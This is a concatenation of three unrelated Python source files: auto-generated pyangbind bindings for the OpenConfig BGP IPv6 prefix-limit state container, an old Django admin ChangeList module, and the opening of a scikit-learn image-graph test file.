namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"global",
"afi-safis",
"afi-safi",
"ipv6-unicast",
"prefix-limit",
"state",
]
def _get_max_prefixes(self):
"""
Getter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
return self.__max_prefixes
def _set_max_prefixes(self, v, load=False):
"""
Setter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_prefixes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_prefixes() directly.
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """max_prefixes must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__max_prefixes = t
if hasattr(self, "_set"):
self._set()
def _unset_max_prefixes(self):
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_prevent_teardown(self):
"""
Getter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
return self.__prevent_teardown
def _set_prevent_teardown(self, v, load=False):
"""
Setter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_prevent_teardown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prevent_teardown() directly.
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """prevent_teardown must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="prevent-teardown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__prevent_teardown = t
if hasattr(self, "_set"):
self._set()
def _unset_prevent_teardown(self):
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
def _get_shutdown_threshold_pct(self):
"""
Getter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
return self.__shutdown_threshold_pct
def _set_shutdown_threshold_pct(self, v, load=False):
"""
Setter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown_threshold_pct is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown_threshold_pct() directly.
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shutdown_threshold_pct must be of a type compatible with oc-types:percentage""",
"defined-type": "oc-types:percentage",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..100']}), is_leaf=True, yang_name="shutdown-threshold-pct", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-types:percentage', is_config=False)""",
}
)
self.__shutdown_threshold_pct = t
if hasattr(self, "_set"):
self._set()
def _unset_shutdown_threshold_pct(self):
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
def _get_restart_timer(self):
"""
Getter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
return self.__restart_timer
def _set_restart_timer(self, v, load=False):
"""
Setter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_timer() directly.
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_timer must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="restart-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=False)""",
}
)
self.__restart_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_timer(self):
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
max_prefixes = __builtin__.property(_get_max_prefixes)
prevent_teardown = __builtin__.property(_get_prevent_teardown)
shutdown_threshold_pct = __builtin__.property(_get_shutdown_threshold_pct)
restart_timer = __builtin__.property(_get_restart_timer)
_pyangbind_elements = OrderedDict(
[
("max_prefixes", max_prefixes),
("prevent_teardown", prevent_teardown),
("shutdown_threshold_pct", shutdown_threshold_pct),
("restart_timer", restart_timer),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/bgp/global/afi-safis/afi-safi/ipv6-unicast/prefix-limit/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State information relating to the prefix-limit for the
AFI-SAFI
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__max_prefixes",
"__prevent_teardown",
"__shutdown_threshold_pct",
"__restart_timer",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"global",
"afi-safis",
"afi-safi",
"ipv6-unicast",
"prefix-limit",
"state",
]
def _get_max_prefixes(self):
"""
Getter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
return self.__max_prefixes
def _set_max_prefixes(self, v, load=False):
"""
Setter method for max_prefixes, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/max_prefixes (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_prefixes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_prefixes() directly.
YANG Description: Maximum number of prefixes that will be accepted
from the neighbour
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """max_prefixes must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__max_prefixes = t
if hasattr(self, "_set"):
self._set()
def _unset_max_prefixes(self):
self.__max_prefixes = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="max-prefixes",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_prevent_teardown(self):
"""
Getter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
return self.__prevent_teardown
def _set_prevent_teardown(self, v, load=False):
"""
Setter method for prevent_teardown, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/prevent_teardown (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_prevent_teardown is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prevent_teardown() directly.
YANG Description: Do not tear down the BGP session when the maximum
prefix limit is exceeded, but rather only log a
warning. The default of this leaf is false, such
that when it is not specified, the session is torn
down.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """prevent_teardown must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="prevent-teardown", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
}
)
self.__prevent_teardown = t
if hasattr(self, "_set"):
self._set()
def _unset_prevent_teardown(self):
self.__prevent_teardown = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="prevent-teardown",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=False,
)
def _get_shutdown_threshold_pct(self):
"""
Getter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
return self.__shutdown_threshold_pct
def _set_shutdown_threshold_pct(self, v, load=False):
"""
Setter method for shutdown_threshold_pct, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/shutdown_threshold_pct (oc-types:percentage)
If this variable is read-only (config: false) in the
source YANG file, then _set_shutdown_threshold_pct is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shutdown_threshold_pct() directly.
YANG Description: Threshold on number of prefixes that can be received
from a neighbour before generation of warning messages
or log entries. Expressed as a percentage of
max-prefixes
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shutdown_threshold_pct must be of a type compatible with oc-types:percentage""",
"defined-type": "oc-types:percentage",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..100']}), is_leaf=True, yang_name="shutdown-threshold-pct", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-types:percentage', is_config=False)""",
}
)
self.__shutdown_threshold_pct = t
if hasattr(self, "_set"):
self._set()
def _unset_shutdown_threshold_pct(self):
self.__shutdown_threshold_pct = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..100"]},
),
is_leaf=True,
yang_name="shutdown-threshold-pct",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-types:percentage",
is_config=False,
)
def _get_restart_timer(self):
"""
Getter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
return self.__restart_timer
def _set_restart_timer(self, v, load=False):
"""
Setter method for restart_timer, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/global/afi_safis/afi_safi/ipv6_unicast/prefix_limit/state/restart_timer (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_timer() directly.
YANG Description: Time interval in seconds after which the BGP session
is re-established after being torn down due to exceeding
the max-prefix limit.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_timer must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="restart-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=False)""",
}
)
self.__restart_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_timer(self):
self.__restart_timer = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="restart-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=False,
)
max_prefixes = __builtin__.property(_get_max_prefixes)
prevent_teardown = __builtin__.property(_get_prevent_teardown)
shutdown_threshold_pct = __builtin__.property(_get_shutdown_threshold_pct)
restart_timer = __builtin__.property(_get_restart_timer)
_pyangbind_elements = OrderedDict(
[
("max_prefixes", max_prefixes),
("prevent_teardown", prevent_teardown),
("shutdown_threshold_pct", shutdown_threshold_pct),
("restart_timer", restart_timer),
]
)
|
|
from django.contrib.admin.filterspecs import FilterSpec
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import quote
from django.core.paginator import Paginator, InvalidPage
from django.db import models
from django.db.models.query import QuerySet
from django.utils.encoding import force_unicode, smart_str
from django.utils.translation import ugettext
from django.utils.http import urlencode
import operator
try:
set
except NameError:
from sets import Set as set # Python 2.3 fallback
# The system will display a "Show all" link on the change list only if the
# total result count is less than or equal to this setting.
MAX_SHOW_ALL_ALLOWED = 200
# Changelist settings
ALL_VAR = 'all'
ORDER_VAR = 'o'
ORDER_TYPE_VAR = 'ot'
PAGE_VAR = 'p'
SEARCH_VAR = 'q'
TO_FIELD_VAR = 't'
IS_POPUP_VAR = 'pop'
ERROR_FLAG = 'e'
# Text to display within change-list table cells if the value is blank.
EMPTY_CHANGELIST_VALUE = '(None)'
class ChangeList(object):
def __init__(self, request, model, list_display, list_display_links, list_filter, date_hierarchy, search_fields, list_select_related, list_per_page, list_editable, model_admin):
self.model = model
self.opts = model._meta
self.lookup_opts = self.opts
self.root_query_set = model_admin.queryset(request)
self.list_display = list_display
self.list_display_links = list_display_links
self.list_filter = list_filter
self.date_hierarchy = date_hierarchy
self.search_fields = search_fields
self.list_select_related = list_select_related
self.list_per_page = list_per_page
self.list_editable = list_editable
self.model_admin = model_admin
# Get search parameters from the query string.
try:
self.page_num = int(request.GET.get(PAGE_VAR, 0))
except ValueError:
self.page_num = 0
self.show_all = ALL_VAR in request.GET
self.is_popup = IS_POPUP_VAR in request.GET
self.to_field = request.GET.get(TO_FIELD_VAR)
self.params = dict(request.GET.items())
if PAGE_VAR in self.params:
del self.params[PAGE_VAR]
if TO_FIELD_VAR in self.params:
del self.params[TO_FIELD_VAR]
if ERROR_FLAG in self.params:
del self.params[ERROR_FLAG]
self.order_field, self.order_type = self.get_ordering()
self.query = request.GET.get(SEARCH_VAR, '')
self.query_set = self.get_query_set()
self.get_results(request)
self.title = (self.is_popup and ugettext('Select %s') % force_unicode(self.opts.verbose_name) or ugettext('Select %s to change') % force_unicode(self.opts.verbose_name))
self.filter_specs, self.has_filters = self.get_filters(request)
self.pk_attname = self.lookup_opts.pk.attname
def get_filters(self, request):
filter_specs = []
if self.list_filter:
filter_fields = [self.lookup_opts.get_field(field_name) for field_name in self.list_filter]
for f in filter_fields:
spec = FilterSpec.create(f, request, self.params, self.model, self.model_admin)
if spec and spec.has_output():
filter_specs.append(spec)
return filter_specs, bool(filter_specs)
def get_query_string(self, new_params=None, remove=None):
if new_params is None: new_params = {}
if remove is None: remove = []
p = self.params.copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(p)
def get_results(self, request):
paginator = Paginator(self.query_set, self.list_per_page)
# Get the number of objects, with admin filters applied.
result_count = paginator.count
# Get the total number of objects, with no admin filters applied.
# Perform a slight optimization: Check to see whether any filters were
# given. If not, use paginator.hits to calculate the number of objects,
# because we've already done paginator.hits and the value is cached.
if not self.query_set.query.where:
full_result_count = result_count
else:
full_result_count = self.root_query_set.count()
can_show_all = result_count <= MAX_SHOW_ALL_ALLOWED
multi_page = result_count > self.list_per_page
# Get the list of objects to display on this page.
if (self.show_all and can_show_all) or not multi_page:
result_list = self.query_set._clone()
else:
try:
result_list = paginator.page(self.page_num+1).object_list
except InvalidPage:
result_list = ()
self.result_count = result_count
self.full_result_count = full_result_count
self.result_list = result_list
self.can_show_all = can_show_all
self.multi_page = multi_page
self.paginator = paginator
def get_ordering(self):
lookup_opts, params = self.lookup_opts, self.params
# For ordering, first check the "ordering" parameter in the admin
# options, then check the object's default ordering. If neither of
# those exist, order descending by ID by default. Finally, look for
# manually-specified ordering from the query string.
ordering = self.model_admin.ordering or lookup_opts.ordering or ['-' + lookup_opts.pk.name]
if ordering[0].startswith('-'):
order_field, order_type = ordering[0][1:], 'desc'
else:
order_field, order_type = ordering[0], 'asc'
if ORDER_VAR in params:
try:
field_name = self.list_display[int(params[ORDER_VAR])]
try:
f = lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
# See whether field_name is a name of a non-field
# that allows sorting.
try:
if callable(field_name):
attr = field_name
elif hasattr(self.model_admin, field_name):
attr = getattr(self.model_admin, field_name)
else:
attr = getattr(self.model, field_name)
order_field = attr.admin_order_field
except AttributeError:
pass
else:
order_field = f.name
except (IndexError, ValueError):
pass # Invalid ordering specified. Just use the default.
if ORDER_TYPE_VAR in params and params[ORDER_TYPE_VAR] in ('asc', 'desc'):
order_type = params[ORDER_TYPE_VAR]
return order_field, order_type
def get_query_set(self):
qs = self.root_query_set
lookup_params = self.params.copy() # a dictionary of the query string
for i in (ALL_VAR, ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, IS_POPUP_VAR):
if i in lookup_params:
del lookup_params[i]
for key, value in lookup_params.items():
if not isinstance(key, str):
# 'key' will be used as a keyword argument later, so Python
# requires it to be a string.
del lookup_params[key]
lookup_params[smart_str(key)] = value
# if key ends with __in, split parameter into separate values
if key.endswith('__in'):
lookup_params[key] = value.split(',')
# Apply lookup parameters from the query string.
try:
qs = qs.filter(**lookup_params)
# Naked except! Because we don't have any other way of validating "params".
# They might be invalid if the keyword arguments are incorrect, or if the
# values are not in the correct type, so we might get FieldError, ValueError,
# ValicationError, or ? from a custom field that raises yet something else
# when handed impossible data.
except:
raise IncorrectLookupParameters
# Use select_related() if one of the list_display options is a field
# with a relationship and the provided queryset doesn't already have
# select_related defined.
if not qs.query.select_related:
if self.list_select_related:
qs = qs.select_related()
else:
for field_name in self.list_display:
try:
f = self.lookup_opts.get_field(field_name)
except models.FieldDoesNotExist:
pass
else:
if isinstance(f.rel, models.ManyToOneRel):
qs = qs.select_related()
break
# Set ordering.
if self.order_field:
qs = qs.order_by('%s%s' % ((self.order_type == 'desc' and '-' or ''), self.order_field))
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
if self.search_fields and self.query:
for bit in self.query.split():
or_queries = [models.Q(**{construct_search(str(field_name)): bit}) for field_name in self.search_fields]
qs = qs.filter(reduce(operator.or_, or_queries))
for field_name in self.search_fields:
if '__' in field_name:
qs = qs.distinct()
break
return qs
def url_for_result(self, result):
return "%s/" % quote(getattr(result, self.pk_attname))
|
|
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
#Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
